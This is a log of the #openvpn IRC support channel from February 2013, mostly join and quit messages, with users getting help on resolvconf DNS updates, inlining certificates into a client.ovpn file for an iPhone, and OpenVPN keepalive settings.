shouldn't show you any "connect" option (or maybe it does and is greyed out, I forget) 02:23 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 02:27 -!- Greek-Boy [~Greek-Boy@41.138.223.38] has joined #openvpn 02:28 -!- Greek-B0y [~Greek-Boy@41.138.223.38] has joined #openvpn 02:31 -!- Greek-Boy [~Greek-Boy@41.138.223.38] has quit [Ping timeout: 244 seconds] 02:32 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 02:36 -!- jtrucks_ [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 02:36 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 246 seconds] 02:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 02:40 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Ping timeout: 630 seconds] 03:11 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 03:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 03:18 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 03:23 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 264 seconds] 03:24 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 03:30 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:30 -!- mode/#openvpn [+o krzee] by ChanServ 03:36 -!- Greek-Boy [~Greek-Boy@41.59.27.19] has joined #openvpn 03:38 -!- Greek-B0y [~Greek-Boy@41.138.223.38] has quit [Ping timeout: 256 seconds] 03:45 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 260 seconds] 03:53 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 03:58 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 04:09 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:10 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 04:10 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 04:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:23 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 04:25 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 04:27 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 272 seconds] 04:28 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 04:31 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 04:34 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 04:38 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 04:58 -!- hive-mind [pranq@mail.bbis.us] has joined #openvpn 04:58 -!- hive-mind [pranq@mail.bbis.us] has quit [Changing host] 04:58 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 05:00 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has joined #openvpn 05:00 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has quit [Changing host] 05:00 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:02 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 05:03 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 05:09 -!- gallatin [~gallatin@dslb-084-058-111-165.pools.arcor-ip.net] has joined #openvpn 05:17 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 624 seconds] 05:18 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 05:25 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 264 seconds] 05:29 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 05:32 -!- erry_ is now known as erry 05:44 -!- Greek-Boy [~Greek-Boy@41.59.27.19] has quit [Ping timeout: 256 seconds] 05:49 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 05:54 -!- erry [erry@freenode/staff/erry] has quit [Remote host closed the connection] 05:54 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 05:56 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn 05:58 -!- gallatin [~gallatin@dslb-084-058-111-165.pools.arcor-ip.net] has quit [Quit: Client exiting] 06:02 -!- yuri__ [~cek@78.26.128.206] has joined #openvpn 06:02 < yuri__> test 06:02 < yuri__> looks like resolvconf doesn't add nameserver when ip-up.sh is run: 06:03 < yuri__> + /sbin/resolvconf -a tun0 + printf '# Generated by openvpn for interface tun0\nnameserver x.x.x.x\n' BUT right after that line I see that no iface was added: 06:03 < yuri__> + resolvconf -i 06:03 < yuri__> wlan0 06:05 < yuri__> here's what i'm getting: https://gist.github.com/celesteking/b97cfc37853305604920 06:05 <@vpnHelper> Title: gist:b97cfc37853305604920 (at gist.github.com) 06:06 -!- cek [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds] 06:06 -!- erry [~erry@freenode/staff/erry] has joined #openvpn 06:09 -!- erry [~erry@freenode/staff/erry] has quit [Read error: Connection reset by peer] 06:09 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 06:11 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 06:12 -!- erry_ is now known as erry 06:12 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 06:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 06:18 -!- erry [erry@freenode/staff/erry] has quit [Remote host closed the connection] 06:23 -!- Mcloven-[Mobile] [~richard@49.176.3.80] has joined #openvpn 06:34 -!- erry [erry@freenode/staff/erry] has joined #openvpn 06:35 -!- erry [erry@freenode/staff/erry] has quit [Read error: Connection reset by peer] 06:35 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 06:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 06:38 -!- yuri__ [~cek@78.26.128.206] has quit [Ping timeout: 276 seconds] 06:41 -!- erry_ is now known as erry 06:41 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 06:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 06:44 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 06:48 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 246 seconds] 06:50 -!- Mcloven-[Mobile] [~richard@49.176.3.80] has quit [Ping timeout: 276 seconds] 06:50 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 06:50 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 06:55 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 06:55 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Max SendQ exceeded] 06:58 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 06:59 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 06:59 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 06:59 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 06:59 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 276 seconds] 07:03 -!- master_of_master [~master_of@p57B520BD.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 07:04 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 07:04 -!- master_of_master [~master_of@p57B5480E.dip.t-dialin.net] has joined #openvpn 07:05 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 07:10 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 07:11 -!- yuri__ [~cek@78.26.128.206] has joined #openvpn 07:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 07:22 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:24 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:26 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has joined #openvpn 07:26 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has quit [Changing host] 07:26 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:27 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 260 seconds] 07:30 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 07:32 <@novaflash> ecrist, EugeneKay: http://9gag.com/fast#6538384 (yeah i know, 9fag, whatever, but it's funny) 07:32 <@vpnHelper> Title: 9GAG - Fast (at 9gag.com) 07:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 07:53 < EugeneKay> No. 07:58 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 07:59 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 08:02 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 08:03 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 08:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 08:06 -!- Guest11768 [~root@94.249.242.85] has joined #openvpn 08:11 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 246 seconds] 08:12 -!- Mcloven-[Mobile] [~richard@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 08:14 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has joined #openvpn 08:14 -!- ade_b [~Ade@koln-4d0b16b4.pool.mediaWays.net] has quit [Changing host] 08:14 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:23 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 08:23 -!- mode/#openvpn [+v s7r] by ChanServ 08:24 -!- yuri__ [~cek@78.26.128.206] has quit [Ping timeout: 276 seconds] 08:25 -!- Mcloven-[Mobile] [~richard@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 08:30 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 08:32 -!- funyun [~funyun@cpe-65-25-103-89.neo.res.rr.com] has joined #openvpn 08:34 < funyun> hi. someone here helped me setup a vpn. i have 4 files in a tblk for tunnelblick. ca.crt client.ovpn client1.crt and client1.key. it works fine on my computer but now i want to set up openvpn on my phone. it tells me to zip my config files and add them to the app. but they're not working. can anyone help me? 08:35 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 08:36 <@plaisthos> funyun: which phone? 08:36 < funyun> plaisthos: iphone 08:36 < funyun> 5 08:36 <@plaisthos> sorry I pass 08:37 < funyun> plaisthos: it's not a phone problem. it's more of a problem with me not knowing what config files go where 08:37 < funyun> i'm a noob 08:37 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 08:39 < funyun> anyone else care to help? any help is greatly appreciated 08:40 -!- Guest11768 [~root@94.249.242.85] has left #openvpn [] 08:40 -!- gagaprince [~root@94.249.242.85] has joined #openvpn 08:41 < gagaprince> put all those file in the same folder 08:41 < rob0> um, "where the config files go" depends on things like how the OS or user interface starts the VPN 08:42 < rob0> If you have a command line and a config file, you run it as such: "openvpn configfile". The "configfile" then says where to find the other files. 08:42 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 08:44 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 08:44 <@plaisthos> funyun: Yes. But I have absolutly no clue of the iOS stuff so I cannot help you there 08:44 < gagaprince> embed everything into the ovpn file 08:44 < gagaprince> problem solved 08:44 <@plaisthos> funyun: my guess is that you can !inline all config and email it to yourself 08:45 <@plaisthos> !inline 08:45 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 08:45 < EugeneKay> Are you the "Gaga prince", or are you instructing us to "gag a prince" ? 08:45 < EugeneKay> Either one is hilarious 08:46 * gagaprince slaps EugeneKay around a bit with a large trout 08:46 < funyun> 09:44 < gagaprince> embed everything into the ovpn file, are you saying to put all config lines into the client.ovpn file? 08:46 < EugeneKay> What? It's a legitimate question 08:46 < rob0> My daughter had a puppy she thought was mail, and named it Prince. I saw it and noticed that it was female, so I called it "the puppy formerly known as Prince." 08:47 < rob0> s/mail/male/ duh 08:47 < EugeneKay> male mail man 08:49 <@plaisthos> funyun: see the !inline description 08:49 < rob0> then we just called it "Prints" because she made messes with paw prints ... worked out okay. 08:51 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 08:51 < funyun> plaisthos: i might as well be reading spanish. this is what i gather from that but i'm probably wrong.. i need to combine all of these into one file? if that's what it means, how do i hand the 2 crt files? 08:52 <@plaisthos> funyun: it is very simple 08:52 < funyun> plaisthos: not to a retard like me 08:52 <@plaisthos> if there is ca foo.crt in your config you replace it with 08:52 <@plaisthos> 08:52 <@plaisthos> [content of foo.crt] 08:52 <@plaisthos> 08:53 <@plaisthos> and do so for key, cert too 08:53 < funyun> plaisthos: okay. do i add for the second crt file? or just ca? 08:53 -!- erry [erry@freenode/staff/erry] has quit [Read error: Connection reset by peer] 08:54 <@plaisthos> funyun: do you have two ca file.crt in your original configuration? 08:54 <@plaisthos> or one that says ca cert1.crt and another that says cert cert2.crt? 08:55 < funyun> plaisthos: yep. these are the files i have. "ca.crt client.ovpn client1.crt client1.key" 08:59 <@plaisthos> now go and edit your client.ovpn 09:00 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 09:02 < funyun> plaisthos: i think i may have found the problem, my crt file doesn't begin with "-----BEGIN CERTIFICATE-----". it begins with "Certificate:" 09:02 < funyun> plaisthos: there is a ton of encryption stuff before it gets to "-----BEGIN CERTIFICATE-----" 09:03 < funyun> algorithm's and things. "Signature Algorithm: sha1WithRSAEncryption" 09:03 < funyun> could that be the problem? 09:03 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 09:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 09:06 <@plaisthos> funyun: should not be 09:06 <@plaisthos> openvpn will ignore everything else 09:07 < funyun> plaisthos: so do i not add that stuff and just add the part with -----BEGIN CERTIFICATE-----? 09:08 <@plaisthos> funyun: works either way 09:09 < funyun> plaisthos: okay. so do i add ? 09:10 < funyun> and if so, where do i find that info? 09:12 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 256 seconds] 09:13 <@plaisthos> funyun: you replace only the entry that already there in your configuration 09:24 < funyun> plaisthos: i guess it was just the app. i was using the jailbroken app. but i just tried one from the app store and it worked. thank you for your help :) 09:25 -!- erry__ [erry@freenode/staff/erry] has joined #openvpn 09:33 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 255 seconds] 09:36 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 09:37 -!- funyun [~funyun@cpe-65-25-103-89.neo.res.rr.com] has quit [Quit: leaving] 09:43 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 09:52 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 09:56 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 09:57 -!- jtrucks_ is now known as jtrucks 09:57 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 10:03 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 10:20 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 10:21 <@ecrist> novaflash: that is funny 10:21 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 272 seconds] 10:24 -!- erry__ is now known as erry 10:26 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 256 seconds] 10:31 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 10:32 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 10:33 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 10:35 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 10:36 <@novaflash> ecrist: yep 10:36 <@novaflash> we have now shared a joke, therefore we are best friends for life 10:37 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 10:38 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 10:44 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 10:46 < EugeneKay> I LOVE YOU ALL WITH A GREAT HUGE LOVE 10:46 <@novaflash> not that much of a best friend though, i hope 10:51 -!- hive-mind [pranq@mail.bbis.us] has joined #openvpn 10:51 -!- hive-mind [pranq@mail.bbis.us] has quit [Changing host] 10:51 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 10:54 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 10:55 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 10:57 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 11:01 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 11:04 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 11:08 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 11:10 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 11:11 -!- gagaprince [~root@94.249.242.85] has quit [] 11:15 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 11:31 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 11:36 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 11:37 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Read error: Connection reset by peer] 11:48 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 11:57 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 612 seconds] 12:12 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 12:17 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 244 seconds] 12:27 -!- erry [erry@freenode/staff/erry] has joined #openvpn 12:29 -!- erry [erry@freenode/staff/erry] has quit [Read error: Connection reset by peer] 12:29 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 12:29 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 12:34 -!- erry_ is now known as erry 12:37 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 252 seconds] 13:10 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 248 seconds] 13:19 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:27 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 13:38 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 14:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:44 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds] 15:02 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:11 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 15:15 -!- flashuni [~textual@50-1-20-224.dsl.static.sonic.net] has joined #openvpn 15:34 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 248 seconds] 15:43 -!- flashuni [~textual@50-1-20-224.dsl.static.sonic.net] has quit [Ping timeout: 252 seconds] 15:49 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:53 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 16:15 -!- BtbN [~btbn@btbn.de] has joined #openvpn 16:19 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 246 seconds] 16:34 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 255 seconds] 16:39 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Read error: Connection reset by peer] 16:46 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:59 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 17:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 17:09 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 17:12 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Remote host closed the connection] 17:24 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 252 seconds] 17:24 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 246 seconds] 17:28 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 17:28 -!- zz_AsadH is now known as AsadH 17:28 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 17:28 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 17:31 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 17:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 17:40 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 17:40 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:55 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 18:13 -!- erry [erry@freenode/staff/erry] has quit [Quit: Segmentation fault] 18:19 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 240 seconds] 18:25 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds] 18:32 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 18:32 -!- erry_ is now known as erry 18:32 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 18:49 -!- knobo [~bohmer@81.175.44.217] has joined #openvpn 18:55 < knobo> I run a tunnel with autossh and pppd, Then I have a script that checks if the tunnel is up. If it is not up, I restart it. Do I need to do that with openvpn too, or does it "just work"? 18:55 < pekster> You want: 18:55 < pekster> !keepalive 18:55 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 18:56 < knobo> thanx 18:57 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 244 seconds] 19:00 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 19:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:07 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 19:10 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 19:19 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:22 -!- knobo [~bohmer@81.175.44.217] has quit [Ping timeout: 256 seconds] 19:43 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 19:50 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 276 seconds] 20:01 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 20:04 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 20:21 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 21:06 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 21:45 -!- mnathani [~mnathani@198.84.231.11] has joined #openvpn 22:10 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 23:04 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 23:22 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 240 seconds] 23:23 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn 23:47 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 23:57 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn --- Day changed Sun Feb 10 2013 00:27 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 00:36 -!- yavor [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 01:41 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- The professional IRC Client :D] 01:41 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 01:45 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 01:48 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 01:52 -!- yavor [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 02:16 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 02:16 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 02:17 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 02:56 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 02:56 -!- Devastator [~devas@unaffiliated/devastator] has left #openvpn [] 02:56 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 03:10 -!- yavor [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 03:21 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Quit: Konversation terminated!] 03:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 03:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:13 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:22 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has joined #openvpn 04:23 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:27 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has quit [] 04:27 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has joined #openvpn 04:32 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has quit [Ping timeout: 256 seconds] 04:38 -!- hid3 [~arnoldas@78.157.71.116] has left #openvpn [] 04:41 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 04:48 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has joined #openvpn 05:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 05:19 -!- ade_b [~Ade@koln-5d817611.pool.mediaWays.net] has joined #openvpn 05:19 -!- ade_b [~Ade@koln-5d817611.pool.mediaWays.net] has quit [Changing host] 05:19 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:23 -!- simplechat [~simplecha@ppp121-44-207-224.lns20.syd7.internode.on.net] has joined #openvpn 05:23 -!- simplechat [~simplecha@ppp121-44-207-224.lns20.syd7.internode.on.net] has quit [Changing host] 05:23 -!- simplechat [~simplecha@unaffiliated/simplechat] has joined #openvpn 05:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:44 -!- simplechat [~simplecha@unaffiliated/simplechat] has quit [Read error: Connection reset by peer] 05:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 05:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:54 -!- xbanux [~xbanux@triband-mum-59.182.149.244.mtnl.net.in] has quit [Ping timeout: 272 seconds] 06:25 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 252 seconds] 06:30 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 06:30 -!- mode/#openvpn [+v s7r] by ChanServ 06:33 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 06:48 -!- yuri__ [~cek@78.26.128.206] has joined #openvpn 06:57 -!- yuri__ [~cek@78.26.128.206] has quit [Ping timeout: 256 seconds] 07:02 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 07:02 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has joined #openvpn 